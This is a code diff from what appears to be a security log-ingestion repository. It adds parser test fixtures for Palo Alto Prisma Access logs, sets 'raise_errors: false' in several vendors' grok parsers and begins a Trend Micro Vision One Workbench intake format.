19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json new file mode 100644 index 000000000..35fa4abec --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json @@ -0,0 +1,119 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "example", + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "jdoe", + "name": "example" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json index f08a677ef..70c31c202 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" @@ -49,7 +50,8 @@ "1.2.3.4" ], "user": [ - "JDOE" + "JDOE", + "test.fr" ] }, "source": { @@ -64,8 +66,8 @@ } }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" }, "user_agent": { "os": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json new file mode 100644 index 000000000..140e7657e --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json @@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "026701003578" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json new file mode 100644 index 000000000..fd4e5a75f --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "example.org", + "jdoe@example.org" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "jdoe", + "email": "jdoe@example.org", + "name": "example.org" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json index 25db7ff0a..c0622d09c 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json @@ -25,6 +25,7 @@ "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json index dee27d0e1..48cbcdca5 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json @@ -44,7 +44,7 @@ "1.2.3.4" ], "user": [ - "JDOE" + "test.fr" ] }, "source": { @@ -53,8 +53,8 @@ "port": 0 }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" } } } \ No newline at end of file diff --git a/RSA/rsa-securid/ingest/parser.yml b/RSA/rsa-securid/ingest/parser.yml index c70fee596..451c6f163 100644 --- a/RSA/rsa-securid/ingest/parser.yml +++ b/RSA/rsa-securid/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: dsv.parse-dsv properties: + raise_errors: false input_field: original.message output_field: message columnnames: diff --git a/Retarus/retarus_email_security/ingest/parser.yml b/Retarus/retarus_email_security/ingest/parser.yml index 6bd68803a..f55fa8ea7 100644 --- a/Retarus/retarus_email_security/ingest/parser.yml +++ b/Retarus/retarus_email_security/ingest/parser.yml @@ -7,6 +7,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.sender output_field: sender pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$" @@ -15,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.recipient output_field: recipient pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$" diff --git a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml index 9fc2ec259..20b07e5f4 100644 --- a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml +++ b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_kv.message.http_request_first_line}}" output_field: message pattern: "%{WORD:http_method} %{URL:url} HTTP/%{NUMBER:http_version}" diff --git a/SonicWall/sonicwall-fw/ingest/parser.yml b/SonicWall/sonicwall-fw/ingest/parser.yml index 8a913cd4e..03aa0ed21 100644 --- a/SonicWall/sonicwall-fw/ingest/parser.yml +++ b/SonicWall/sonicwall-fw/ingest/parser.yml @@ -35,6 +35,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.susr}}" output_field: result pattern: "(%{USER_WITH_DOMAIN}|%{GREEDYDATA:user_name})" @@ -47,6 +48,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.msg}}" output_field: result pattern: "(%{GREEDYDATA}[F|f]ilename: %{FILE:filename}%{GREEDYDATA})" diff --git a/Sophos/sophos edr/ingest/parser.yml b/Sophos/sophos edr/ingest/parser.yml index f7dc22739..c4779fa3f 100644 --- a/Sophos/sophos edr/ingest/parser.yml +++ b/Sophos/sophos edr/ingest/parser.yml @@ -9,6 +9,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: 'Access was blocked to "%{URL:url}" because of "%{WORD:rulename}".' @@ -19,6 +20,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "Controlled application %{WORD}: %{GREEDYDATA:process_title}" @@ -27,6 +29,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "%{REMOVABLE_STORAGE}|%{STORAGE}" @@ -38,6 +41,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "PUA %{GREEDYDATA:action}: '%{GREEDYDATA:threat}' at '%{GREEDYDATA:file_path}'" @@ -46,6 +50,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "'%{GREEDYDATA:threat}' exploit prevented in %{GREEDYDATA:category}" diff --git a/Squid/squid/ingest/parser.yml b/Squid/squid/ingest/parser.yml index f5b9de6f9..14c43d5d1 100644 --- a/Squid/squid/ingest/parser.yml +++ b/Squid/squid/ingest/parser.yml @@ -48,6 +48,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.url output_field: message pattern: "(%{IP:ip}|%{NOTSPACE:domain}):%{NUMBER:port}" diff --git a/Systancia/cleanroom/ingest/parser.yml b/Systancia/cleanroom/ingest/parser.yml index 0b80ff87c..44342010b 100644 --- a/Systancia/cleanroom/ingest/parser.yml +++ b/Systancia/cleanroom/ingest/parser.yml @@ -16,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{event.result.event_reason}}" output_field: result pattern: "%{SESSION_SUCCESS}|%{SESSION_FAILURE}|%{PROCESS}" diff --git a/Tehtris/tehtris-edr/ingest/parser.yml b/Tehtris/tehtris-edr/ingest/parser.yml index cbcb244bb..aa8f22411 100644 --- a/Tehtris/tehtris-edr/ingest/parser.yml +++ b/Tehtris/tehtris-edr/ingest/parser.yml @@ -23,6 +23,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.description}}" pattern: "(%{APPLICATION_POLICY}|%{URL_DETECTED}|%{MALICIOUS_MACRO})" custom_patterns: diff --git a/ThinkstCanary/thinkst-canary/ingest/parser.yml b/ThinkstCanary/thinkst-canary/ingest/parser.yml index f8cada9ff..8ce315396 100644 --- a/ThinkstCanary/thinkst-canary/ingest/parser.yml +++ b/ThinkstCanary/thinkst-canary/ingest/parser.yml @@ -21,6 +21,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{parsed_event.message.DN}}" output_field: result value_sep: "=" diff --git a/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md b/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md new file mode 100644 index 000000000..11bddf32c --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md @@ -0,0 +1,8 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [Unreleased] diff --git a/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml new file mode 100644 index 000000000..2f93f2919 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml @@ -0,0 +1,39 @@ +action.properties.ScriptBlockText: + description: '' + name: action.properties.ScriptBlockText + type: keyword + +trendmicro.vision_one.alert_id: + description: '' + name: trendmicro.vision_one.alert_id + type: keyword + +trendmicro.vision_one.case_id: + description: '' + name: trendmicro.vision_one.case_id + type: keyword + +trendmicro.vision_one.detection_name: + description: '' + name: trendmicro.vision_one.detection_name + type: keyword + +trendmicro.vision_one.incident_id: + description: '' + name: trendmicro.vision_one.incident_id + type: keyword + +trendmicro.vision_one.investigation_status: + description: '' + name: trendmicro.vision_one.investigation_status + type: keyword + +trendmicro.vision_one.severity: + description: '' + name: trendmicro.vision_one.severity + type: keyword + +trendmicro.vision_one.status: + description: '' + name: trendmicro.vision_one.status + type: keyword diff --git a/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png b/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png new file mode 100644 index 000000000..e51bb3eb7 Binary files /dev/null and b/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png differ diff --git a/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml new file mode 100644 index 000000000..014352012 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml @@ -0,0 +1,12 @@ +uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e +automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05 +automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6 +name: Trend Micro Vision One Workbench Alerts [BETA] +slug: trend-micro-vision-one-workbench-alerts + +description: >- + Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation. + This intake format will ingest Workbench Alerts from Trend Micro Vision One. + +data_sources: + Process monitoring: diff --git a/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json new file mode 100644 index 000000000..742eee7cc --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json @@ -0,0 +1,10 @@ +[ + { + "value": "{event.reason} on {host.ip}", + "conditions": [{ "field": "event.reason" }, { "field": "host.ip" }] + }, + { + "value": "{event.reason}", + "conditions": [{ "field": "event.reason" }] + } +] diff --git a/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml new file mode 100644 index 000000000..f5859582b --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml @@ -0,0 +1,102 @@ +name: trend-micro-vision-one-workbench +ignored_values: [] +pipeline: + - name: parsed_event + external: + name: json.parse-json + properties: + input_field: "{{original.message}}" + output_field: message + + - name: set_ecs_fields + +stages: + set_ecs_fields: + actions: + - set: + event.kind: alert + event.category: ["intrusion_detection"] + event.type: ["info"] + observer.vendor: "TrendMicro" + observer.product: "Vision One" + + event.reason: "{{parsed_event.message.model}}" 